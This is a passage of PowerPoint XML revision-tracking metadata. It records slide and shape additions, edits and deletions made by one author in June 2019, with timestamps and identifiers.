            <ac:spMk id="4" creationId="{F50B2BAE-4410-4E63-A783-11E0E356E5BF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{9A8D6C2D-ED3D-4F07-13FF-4EC5EC3972BB}" dt="2019-06-04T20:28:16.226" v="120" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="5" creationId="{DD1D58D5-0218-4BED-90D6-4F6819111FE2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{9A8D6C2D-ED3D-4F07-13FF-4EC5EC3972BB}" dt="2019-06-04T20:35:15.572" v="750" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="6" creationId="{D9015465-6EB7-4351-B478-AB5BC688F149}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}"/>
    <pc:docChg chg="addSld modSld sldOrd">
      <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T12:42:08.631" v="1767" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T06:20:06.730" v="109" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="109857222" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T06:19:43.434" v="8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Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T06:20:06.730" v="109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delSp modSp new">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T06:19:11.216" v="18" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1926449966" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T06:19:11.216" v="18" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:spMk id="2" creationId="{87BB03A3-9C31-4CFE-B7EC-501A92F713CE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T06:18:25.826" v="17"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:spMk id="3" creationId="{575D2EB2-07EC-40E3-808D-C306CF5A6C81}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T12:26:05.893" v="1540" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2886590775" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T10:39:00.565" v="121" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="2" creationId="{6E15723C-2368-4809-A835-2A53B4CC56DC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T06:18:20.459" v="16"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="3" creationId="{0D3C3307-1532-46B1-BD3F-B0E627CC6AF5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T10:39:32.534" v="153" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="3" creationId="{7200B702-4D35-46CE-9CF9-B0946A6D7592}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T10:42:25.847" v="312" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="4" creationId="{8AE5C81D-0FFB-4CBD-BF89-8872B36B94EF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T10:41:49.675" v="301" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="5" creationId="{191CC491-9D7C-4267-9080-C9575711A4F3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T10:42:42.629" v="325" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="6" creationId="{53E9DF78-EFAC-4F59-8611-0FEDADADCA6A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T10:43:30.832" v="388" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="7" creationId="{0F04E23D-A26E-4029-B989-CC81B51B3DB5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T10:48:34.147" v="480" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="8" creationId="{5B1A0ACD-7B0B-4F6B-AED4-F2F5B2C68BAC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:07:06.732" v="751" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="9" creationId="{D718A3D6-FC8B-4691-A3BA-54C25E2D20F3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:57:48.909" v="1466" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="10" creationId="{966440A0-F4F2-4001-9BE7-5D9C213C4A63}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T12:26:05.893" v="1540" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="11" creationId="{27CA9ED9-F5A6-426C-8EEB-3307AB12BA3E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T12:15:33.251" v="1532" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2809929173" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T10:46:13.958" v="460" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:spMk id="2" creationId="{CD06FDCD-F202-44B7-8AAA-17D531BA5E15}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T06:18:16.028" v="15"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:spMk id="3" creationId="{372AE5E2-B656-4219-85AF-B819F12DF817}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:00:39.167" v="533" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:spMk id="3" creationId="{E9514551-CD8A-40A6-A998-E7618E31C4FA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:02:05.824" v="614" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:spMk id="4" creationId="{13474DE2-D7F6-455A-B8DF-0A80C79F7CBA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:04:06.544" v="627" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:spMk id="5" creationId="{D1CB152A-E8C6-4642-8761-9A7C31E61713}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T12:15:33.251" v="1532" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:spMk id="6" creationId="{F8B6CE1F-C11B-434D-B9B2-56DE5E15CD25}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:35:25.244" v="1399" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3389707094" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:08:55.655" v="754" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="2" creationId="{496DE6F0-0365-4996-86ED-FFF7DE98959E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T06:18:08.889" v="14"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="3" creationId="{3AC9557D-D27F-4191-BF60-27EBDE35A4C3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:10:28.046" v="787" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="3" creationId="{CEA5E269-53FF-4139-94B1-F3A6BFFA2EA8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:14:57.407" v="1021" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="4" creationId="{C1072647-6C18-4C9E-8B4B-F8295ED393E9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:15:46.642" v="1022" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="5" creationId="{5EA71619-7F44-45B9-A914-4CE8B3B96203}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:15:46.642" v="1023" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="6" creationId="{E9131EC6-F179-44CF-92B2-150516411302}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:15:46.658" v="1024" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="7" creationId="{A0ACCE37-DFD4-4F05-9F63-DB5BBF156C6C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:15:46.673" v="1025" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="8" creationId="{C5184F34-5CD6-4F2B-8331-3C64F01D347F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:15:46.673" v="1026" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="9" creationId="{50EB8D91-27F6-475F-B492-10CF534F0296}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:15:46.689" v="1027" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="10" creationId="{803F2287-8D29-443A-B474-51DD77920CF6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:35:25.244" v="1399" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="11" creationId="{4433FC25-B531-47BF-9B5B-3260DC990C9B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T12:42:04.412" v="1766" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1727781075" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:16:37.674" v="1028" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="2" creationId="{11B2CB23-0A51-4BE0-B46E-1691D22EDCA5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T06:18:04.326" v="13"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="3" creationId="{165966DC-E45C-41F3-A57D-9AC146B0B3D6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T12:40:11.349" v="1650" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="3" creationId="{2E57E17D-B5F0-46C7-9504-7C20ABA2E4F1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T12:42:04.412" v="1766" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="4" creationId="{738ABD5B-44C3-4BF8-9232-2B17C43E1C9D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new ord">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:18:20.174" v="1064"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="83843372" sldId="262"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T06:17:58.217" v="12"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="83843372" sldId="262"/>
            <ac:spMk id="2" creationId="{522258EE-A4D1-4F31-8B0A-4886F0B076D5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T06:17:54.357" v="11"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="83843372" sldId="262"/>
            <ac:spMk id="3" creationId="{E21600A4-EE68-4A7C-A4BB-36C89CE89A05}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:17:11.252" v="1033" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3166696917" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:17:11.252" v="1033" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="2" creationId="{C3628ED8-9331-46E5-B8CC-52610F82D4AA}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:17:38.502" v="1036" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="777082745" sldId="264"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:17:38.502" v="1036" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="777082745" sldId="264"/>
            <ac:spMk id="2" creationId="{DDD3AA39-1869-46D9-A416-6366CCB0BDE8}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp new">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:18:12.127" v="1063"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2507243378" sldId="265"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:18:06.596" v="1059" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2507243378" sldId="265"/>
            <ac:spMk id="2" creationId="{84DC35D7-C02E-450D-8C32-9B3C6879687D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{0D8633D2-EB2D-37E5-B5C1-99EB3BD4C4B6}" dt="2019-06-04T11:18:12.127" v="1063"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2507243378" sldId="265"/>
            <ac:spMk id="3" creationId="{16EBFDAA-7CFE-491A-80F2-B405ADBDD680}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
